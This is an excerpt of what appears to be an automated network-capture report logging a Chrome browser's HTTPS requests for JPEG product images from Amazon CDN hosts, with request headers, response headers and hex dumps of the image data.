                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC659INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 10657
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: c81e5d19-693d-4af4-ad29-f609a2bf2ddc
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Wed, 23 May 2018 15:17:32 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Sat, 26 Mar 2044 17:14:20 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 1839932
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:46 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kcgs7200033-IAD, cache-ewr-kewr1740060-EWR
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 c8 01 20 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 07 05 06 03 04 08 02 01 09 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 01 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ec b0 00 00 0a e9 9a 1b 9e 9b 44 d6 4b e6
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$* "4DK
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1378INData Raw: 93 65 8b a9 bb 07 3b 18 2f d0 97 a3 f6 f3 b2 86 ee f4 d2 b3 24 d4 ad a9 c1 cb e6 7d 06 71 4b 59 dc 63 d6 2c ae a6 4e a2 ac ea 48 9b c7 e0 b2 9a db dd 92 95 81 e9 8f 90 95 37 db a6 d1 62 86 1e 5e 23 f7 ac a6 99 7b 1d c2 0e 1d cf f5 23 07 60 01 4e 13 cb 68 bd 3d a4 65 cf ef 44 eb 62 36 47 ef 65 cd 1b 12 d9 d2 6b ee 5a 52 9d 36 13 c8 c8 06 13 a4 c2 1c db 6e b4 8d 6c 02 57 c2 57 d1 a7 48 d3 a3 71 19 32 57 d2 69 99 fa fe f4 ac e6 0e fa dc 61 a2 e6 8d 8b 60 ee 70 93 fd f2 b9 8b 6d 73 84 dd bd 5b cc 9f 73 26 e6 8d eb 63 c4 ed f8 f3 17 45 63 38 92 7a 89 6d ff 00 d7 e6 4c 6f b3 8c 0c c5 4d a7 6f e3 75 d4 40 34 77 98 27 66 43 2f 94 9d 27 0f f5 0e d0 1f a9 bf 26 67 aa 59 33 bb 6b 32 db 4c 30 b3 28 69 5d 82 63 7a bb 7e 33 07 c9 17 e9 c8 53 e5 bc e9 5b ce 19 f1 57 2a
                                                                                                                                                                                                                                                                      Data Ascii: e;/$}qKYc,NH7b^#{#`Nh=eDb6GekZR6nlWWHq2Wia`pms[s&cEc8zmLoMou@4w'fC/'&gY3k2L0(i]cz~3S[W*
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1378INData Raw: eb 57 7a 30 2a 48 3e 2b e2 88 d6 30 44 e1 9c 3c 60 d7 a4 bd ff 00 53 0f ef 59 bb c3 89 51 cd a4 e9 5d dc c5 4b 02 9d c2 71 9e 10 70 cf 31 3c 83 c7 85 70 d3 9c fe be 8a 34 19 37 01 df 0e bd 89 a9 f3 71 3a 4e d1 6a 2b 86 da ea 86 71 2e 0f 56 77 d5 33 38 65 f8 7f 27 80 f0 c3 e1 97 e5 fb 38 7f 0b af 04 7a 33 4c fb fd 0e 98 38 dd 35 41 7c 55 39 16 bd 12 a3 34 0c 34 3c 47 f8 d7 fb c6 b2 b6 a8 ed 7f 01 14 16 3a 0c 0f e3 cf 6f d5 7a 22 d4 a1 12 fb 34 12 9a fa bc 8d 3f 08 af a6 b0 d1 2a 78 21 75 1d ef e1 f8 57 77 6e 03 88 62 f0 2c 45 94 61 61 d3 ed e6 83 18 cb 9e 70 da ba 9b 3a 83 e3 c4 31 39 e9 f4 51 7f 34 07 88 d3 59 77 26 d1 b6 cb 78 36 13 cf f8 18 92 be 0f 84 9d e8 14 50 34 af 7e b1 da 66 de 54 7d 38 18 83 16 b0 bf 87 2b 15 72 53 61 a2 c2 5c a5 9b 4f ec 52 27
                                                                                                                                                                                                                                                                      Data Ascii: Wz0*H>+0D<`SYQ]Kqp1<p47q:Nj+q.Vw38e'8z3L85A|U944<G:oz"4?*x!uWwnb,Eaap:19Q4Yw&x6P4~fT}8+rSa\OR'
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1378INData Raw: da dc a4 c1 a3 9f 35 a4 7d ed be 51 a2 34 54 c4 d6 a6 06 18 8c f2 28 6f 94 71 cf 76 13 4c 41 74 52 8b a1 35 c2 81 a1 69 74 11 19 0c 78 85 1c 7c f2 4d 32 54 b4 b2 dc 2e 57 8c 03 48 9f 8c ca 2b 69 95 47 be 34 20 c8 9e 12 fb a5 0c 13 a3 4e e3 7c f0 91 a3 87 54 4d 88 73 c8 9f 75 21 84 2b 52 5f cf b2 7b da 5c 7c a3 07 f2 53 29 6e 86 13 c6 44 53 93 85 f3 52 b1 58 82 35 a3 78 c3 2c 1b c4 70 71 17 a4 95 dc 14 c8 84 e4 eb d6 23 52 b1 05 6a 35 ab 11 83 6a db 4b 62 34 8b f3 c4 dd de b7 a6 00 53 db 36 ac f2 05 2b 4b aa 8b 18 9a 54 34 e3 66 b8 1a 25 a9 66 c2 28 f4 5e 16 fe 45 4e e7 29 f1 49 a7 1e 72 df fe 66 f4 fd e3 a0 7b f7 2a 90 29 27 b4 a9 4c 67 7b a3 a9 66 e1 1a 07 aa d4 35 95 3e 48 a1 0d 8a 77 5a d4 7b d8 30 7c c2 05 3b ae 87 97 25 3c f5 e4 ca 8b 6c eb 43 ec c2
                                                                                                                                                                                                                                                                      Data Ascii: 5}Q4T(oqvLAtR5itx|M2T.WH+iG4 N|TMsu!+R_{\|S)nDSRX5x,pq#Rj5jKb4S6+KT4f%f(^EN)Irf{*)'Lg{f5>HwZ{0|;%<lC
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1378INData Raw: b8 c7 58 ec 99 5f 27 b5 01 83 f9 80 55 1c b1 e6 6b 96 27 a0 43 21 6a 6a 11 f5 f3 d9 9e c8 21 fc 54 3f 98 8c b1 81 f4 ea c3 89 01 a5 f7 da c0 9b 10 df cf 02 d4 e1 6d d9 23 d5 00 df ce 19 cd 90 bd d1 d4 08 e1 a6 e3 cc 80 87 97 95 1d 7f cb f9 9c 0a 07 e6 80 fd 59 8f 70 ed 1e 36 78 50 44 b4 ef 1e 97 00 ab f9 95 c0 d8 50 be 27 d9 1d f6 ef ee 22 8c 88 5b 17 ef f3 38 15 c9 5a 80 ea fd 9f 5e de 6a c2 b6 ab 71 8b f6 76 93 d0 3b 14 13 e4 7f b4 13 40 b1 28 f1 7e ca 6a e6 8b d1 35 cd 5e d3 d0 7e c9 cb 49 cd c9 6e bb 76 95 be 14 f5 d7 b1 00 d3 9d cf c0 ec 3d 47 63 c5 30 59 7b 09 d8 23 e7 d1 0b ec fc c1 e9 5c b0 d0 42 bc cb b3 1d c7 61 47 b9 04 a7 3f 31 39 a0 bf 01 c1 d4 2b 88 0b 49 64 1d bc 07 c5 d4 5d 6c 1f 72 0a 28 39 2e dc 07 0c 4e 82 57 0d c2 60 61 64 28 42 b0 68
                                                                                                                                                                                                                                                                      Data Ascii: X_'Uk'C!jj!T?m#Yp6xPDP'"[8Z^jqv;@(~j5^~Inv=Gc0Y{#\BaG?19+Id]lr(9.NW`ad(Bh
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1378INData Raw: 41 5a 60 3c 44 be 27 4c 98 44 45 87 67 b1 30 ed 48 11 27 44 a8 c0 cd c7 2d 64 3a 67 6a 4a 73 93 41 77 e8 b8 fc 0e 58 55 34 39 68 21 40 16 af b0 a0 a6 48 20 90 62 08 a1 09 93 75 82 9d 11 41 ec 09 9e 6c af 2d fa 45 df a4 db 23 45 6f cc 5f 4f 41 e8 5b ce 2f 40 49 02 21 61 a8 c8 a0 b0 62 08 88 31 05 d1 b8 5c fb ea ba c3 d1 bb 20 a7 4e c8 49 cd 4c d6 cd 10 64 06 00 60 20 00 09 f2 00 25 9e ca 96 41 19 95 8e 41 65 1a 2c 9d ed 3a 2e 61 46 8a 88 37 1d 31 b4 02 4a dc 35 f2 11 93 ba 8c e9 9b 74 3d 2e c8 88 85 cc 1a e4 e8 c6 5d 14 47 00 28 e1 4d 22 8a ce 0c ef 0f 0b ca ce 31 de f9 25 c3 ab d9 ca e1 8a a6 53 90 c0 0c 41 0e 0b da 11 81 31 45 b3 2e 52 28 f4 b1 d0 77 41 d0 00 32 49 00 72 72 9a 34 39 d3 99 a0 a8 1e 01 20 9e 9a 67 74 db 3c c5 09 e3 a0 d8 1f f0 21 e0 8c 7a
                                                                                                                                                                                                                                                                      Data Ascii: AZ`<D'LDEg0H'D-d:gjJsAwXU49h!@H buAl-E#Eo_OA[/@I!ab1\ NILd` %AAe,:.aF71J5t=.]G(M"1%SA1E.R(wA2Irr49 gt<!z
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1378INData Raw: b5 ce e0 66 30 12 e8 13 f9 8c 28 51 2f 7d fc 82 07 65 c8 8c 3d b0 af fb 40 c5 c4 2d f8 11 43 a3 96 cc 0b c3 a5 0b 2b 6d 2c e7 2d bb b9 88 03 aa d9 5f 43 02 b4 69 1a 9b 77 da 21 37 f8 5f 32 f9 08 fe b2 1a 6b bc 17 e0 66 81 cb 40 c0 b9 81 5e c2 72 a0 b5 e4 65 97 76 94 72 7f 03 15 de 09 dc 78 f4 3c 70 43 56 96 20 85 e5 12 d8 90 62 7c 49 4e 1d 5e bb 4c e9 e4 6f 64 93 b8 c0 7c 09 5c 5b 19 08 32 2a d9 7d 6a b8 6b b3 69 0c ba 38 35 86 77 54 e4 61 da a5 d4 44 27 ee 85 ec c4 d4 db 94 3c 11 5d 9c 96 56 2e 95 bb 59 53 85 5d a1 36 82 a9 62 73 39 0b aa 41 c5 2b 79 5a 4c 21 97 f2 c4 09 0c 3b b3 c8 fb d8 6b 3f f6 01 63 0c 28 06 80 a8 3b e3 20 dd 8b 2e 5b 0e b4 c1 9a 15 75 a3 57 ac ae a8 e6 d2 8b 4c e9 b9 7c 06 a6 4b c6 77 52 4e 0b 02 ae 80 e3 f8 4d c5 b9 b8 94 6f ad 51
                                                                                                                                                                                                                                                                      Data Ascii: f0(Q/}e=@-C+m,-_Ciw!7_2kf@^revrx<pCV b|IN^Lod|\[2*}jki85wTaD'<]V.YS]6bs9A+yZL!;k?c(; .[uWL|KwRNMoQ
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1011INData Raw: 2b d2 01 89 01 72 4a 45 f7 57 d3 36 a6 7c 17 fd bb 0c 4d f5 18 f4 bc 4c ca d6 d7 9d 37 e0 9e 13 e5 d3 8b f1 b0 26 36 9b 85 21 b9 23 d7 8d fa 3a 8e 0b 1c bd a2 40 00 dd 14 47 cc 24 a4 ae 62 cb 83 d4 22 a3 ec 12 b3 44 f6 6f 1e 1a 8d 80 cd 0e da ed a6 53 8b b5 1b f9 c2 c1 d4 cf 70 69 6d eb 98 22 09 7e 6c fc 93 14 98 ba dc a3 e3 20 94 ff 00 94 26 f0 a4 da 23 0e 31 1f 46 62 b1 7a 0c db 8e 48 fe 5f 54 20 09 13 74 2d 07 22 5b 9a a5 37 20 9d 4d 70 50 58 e0 b0 20 3a 04 d9 ff 00 13 72 7c 01 11 1c 5b c4 c6 db ff 00 1a 53 70 1e c1 ec 02 b8 a3 3c 47 c3 49 3a 8a 6a e2 23 7d 90 b1 dc f7 2f 7c 91 d1 fc 21 cb 10 bb 2c 41 66 53 e8 0f 37 6c 89 e3 80 ac 71 46 44 70 91 86 12 6d fa 44 98 91 64 97 e8 0c ab 40 15 8e 92 53 1e 8a 69 fb 96 e0 80 39 7e ff 00 84 63 32 9c c3 1f 51 0e
                                                                                                                                                                                                                                                                      Data Ascii: +rJEW6|ML7&6!#:@G$b"DoSpim"~l &#1FbzH_T t-"[7 MpPX :r|[Sp<GI:j#}/|!,AfS7lqFDpmDd@Si9~c2Q


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      123192.168.2.549853151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC610OUTGET /images/I/61kj0CBNocL._AC_SY200_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 5344
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 316dd9e9-a36e-4126-9488-2d37c5d278c8
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Thu, 21 Feb 2019 12:26:36 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Sun, 05 Jun 2044 23:41:30 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 722338
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:46 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100104-IAD, cache-ewr-kewr1740074-EWR
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 c8 00 7a 03 01 22 00 02 11 01 03 11 01 ff c4 00 90 00 00 02 02 02 03 01 00 00 00 00 00 00 00 00 00 00 06 07 00 08 04 05 02 03 09 01 10 00 02 01 03 02 02 06 06 06 08 04 05 05 00 00 00 01 02 03 00 04 11 05 12 06 21 07 13 22 31 41 51 14 61 71 81 92 a1 08 32 52 91 a2 c2 23 33 42 53 62 72
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*z"!"1AQaq2R#3BSbr
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1378INData Raw: bd 20 be eb e5 5f b3 10 a1 48 de 31 7f f2 6e be 6f 1f fa d0 fd fb 6e 16 be ab 68 85 6d b8 b8 e6 00 3c e5 8e 87 1e 6d e9 11 f2 4c 7c 24 8a a8 62 f4 37 00 b9 e3 0d 06 33 e1 2c cd fd a8 25 7a f4 5a a8 2f d1 d6 cf d3 38 be 09 3b fd 1a d2 e9 fe fd b0 fe 7a bf 54 a2 54 a9 52 a0 95 2a 54 a0 51 e9 da 8c 1a 56 a5 c4 9a 75 db f5 24 de 47 34 65 c1 48 9d 2e 93 76 e0 fd df ac 57 42 7e d2 9a 1c e2 7b 42 e8 65 5e d2 f8 32 e1 94 fb 08 c8 a2 ce 95 f8 f3 87 78 7a dc a6 ab 17 a5 4c 07 62 08 c7 e9 57 7f 71 32 65 7a a0 d8 f3 04 80 48 07 06 a8 0e a5 c7 93 5d 5f 4b 77 0a 18 90 b1 d8 8b 33 02 a8 ac cc 88 cc 02 ef da a7 69 62 bb 9b bc d3 0d 3a ae 46 d7 20 d7 52 91 9a 47 4f c6 f7 a5 b7 47 3c a8 31 cd 4b 09 7e 6c 2b 22 2e 39 d4 41 00 ce 4f b6 38 be 67 00 0a d0 b0 b6 74 75 a5 8e ea
                                                                                                                                                                                                                                                                      Data Ascii: _H1nonhm<mL|$b73,%zZ/8;zTTR*TQVu$G4eH.vWB~{Be^2xzLbWq2ezH]_Kw3ib:F RGOG<1K~l+".9AO8gtu
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1378INData Raw: b1 e4 bb f1 a9 f9 4b fd 33 74 2b be 1e 57 56 bb 7b 6d bf c5 cc 53 92 f7 8f b8 1a c2 c6 48 f4 c5 87 d2 08 e6 6d 74 f2 09 f6 ca 63 44 f7 97 aa 97 1e ad aa c1 da 49 47 be 3f fc 29 14 43 a4 f1 8d fb cf 10 9a ce da e3 c0 03 6f 0b 73 ee 5c 8d 88 79 13 9e f1 eb ab de d3 c6 24 95 0e ab d7 dc 28 72 91 9e 6c 14 b2 29 24 00 1d c6 51 49 24 0c 67 99 35 a2 48 bd 26 ce e2 cc f3 7b 57 69 a0 3e 60 e1 6e 23 fe a4 02 40 3c d3 d7 56 53 4e 9a 3d 7a df aa bd 91 54 15 19 8a d2 4d 8b e4 55 82 34 b0 12 bb 47 23 bb 02 94 1c 5d c2 df e0 d7 42 68 64 2c bd af e1 94 2f 3c f7 76 5c 84 e7 81 83 9e 61 70 09 ab e4 67 a2 ae c8 79 1c 77 64 d6 f3 56 93 7b bb fd ae 78 f6 d7 56 ba 83 d2 6e 48 50 83 ac 60 15 79 2e 00 e4 47 87 68 76 bd 79 ae fd 52 1d aa c3 ec f2 fb b9 56 d9 7a 87 d1 5d aa da f0
                                                                                                                                                                                                                                                                      Data Ascii: K3t+WV{mSHmtcDIG?)Cos\y$(rl)$QI$g5H&{Wi>`n#@<VSN=zTMU4G#]Bhd,/<v\apgywdV{xVnHP`y.GhvyRVz]
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1210INData Raw: d4 77 38 ad 46 2d 9b 71 e9 5f 40 37 46 e7 83 34 46 3d ea 93 af c1 34 89 4d 2a af 1f 45 7d 4f d2 78 6a e6 d8 9e 76 b7 d3 00 be 4a ea 8f 56 1e a0 d1 6b 3c 07 a2 eb 97 50 de 5f d9 47 3c b0 9c ab 38 2c 3c b9 a6 76 37 bc 1a de d4 a9 41 57 7a 59 32 f1 ff 00 12 43 c3 71 b9 4b 0d 21 52 6b d9 00 ef 92 41 d8 45 f0 df b1 b0 9e 5b dc e0 ec ae 9d 66 da de 2b 75 b3 8e 25 48 11 42 ac 2b 95 44 55 3b 97 6f 73 02 1b b4 1f 3b b7 76 b3 9a 2a d2 34 e4 b0 4d 56 7e f9 2f f5 3d 46 59 1b bc f6 67 92 08 93 3e 51 a2 77 7e c9 66 a0 6e 20 ba e6 71 40 9d d6 f8 6a de 47 2e b9 0d f6 81 08 ff 00 2c 29 fc 23 d5 42 c6 0b fb 18 cc 76 d7 9d 85 e6 22 7c a0 e5 e0 07 25 fb a8 f3 55 94 43 1c b3 ce dd 5c 31 b8 53 27 d6 dc ec 37 04 8c 64 07 3b 7b 47 98 0a 08 24 f3 5c af 2e f5 9b 39 09 da ef 8e 7c
                                                                                                                                                                                                                                                                      Data Ascii: w8F-q_@7F4F=4M*E}OxjvJVk<P_G<8,<v7AWzY2CqK!RkAE[f+u%HB+DU;os;v*4MV~/=FYg>Qw~fn q@jG.,)#Bv"|%UC\1S'7d;{G$\.9|


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      124192.168.2.54984918.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC689OUTGET /images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871140_186x116_1X_en_AE._SY116_CB569183660_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 5216
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: b6c6f473-dfe4-4a62-8a40-fa12734bc956
                                                                                                                                                                                                                                                                      Date: Tue, 13 Aug 2024 09:40:02 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 23 Jul 2024 07:16:18 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-488,/images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871140_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      Expires: Mon, 08 Aug 2044 09:40:02 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-488 /images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871140_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 c870b446425c4f7268b92b3b09abcba8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 399249
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: awBM9aWr1k5MApzSRJ0T2_AcbYO2nZuvXv2kLpMfKjRy0N4uaTa9Jw==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC5216INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 14 0f 0f 0c 0f 0f 1a 13 0e 13 11 18 0f 11 11 18 11 18 18 11 15 18 15 15 1b 18 14 14 18 1b 15 18 19 25 19 1d 1a 20 1b 19 23 19 25 19 25 24 24 26 29 2a 25 18 29 38 01 09 09 05 09 09 09 0c 09 09 14 23 18 0f 1b 24 1d 0c 19 2b 24 2a 1b 24 26 24 24 1a 2f 24 2a 23 24 15 25 24 1b 20 20 1b 1b 1d 19 1d 24 1b 26 26 25 0f 1a 26 23 18 32 1a 1b 18 24 23 29 20 18 26 2d ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 9f 00 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 07 05 06 01 02 04 08 03 10 00 02 01 03 03 02 03 05 06 05 03 04 03 00 00 00 01 02 03 00 04 11 05 12 21 06 31 13 41 51 07 14 22 61 91 15 16 32 52 71 d2 33 42 53 b1 d1 24 81 92 08 43
                                                                                                                                                                                                                                                                      Data Ascii: JFIF% #%%$$&)*%)8#$+$*$&$$/$*#$%$ $&&%&#2$#) &-t"!1AQ"a2Rq3BS$C


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      125192.168.2.549858151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC610OUTGET /images/I/41aNmwLQvxL._AC_SY200_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC659INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 5416
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 40fc8e01-abd9-4e27-9f81-76ae569f1d2b
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 05 Apr 2024 06:57:23 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Thu, 31 Mar 2044 12:55:18 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
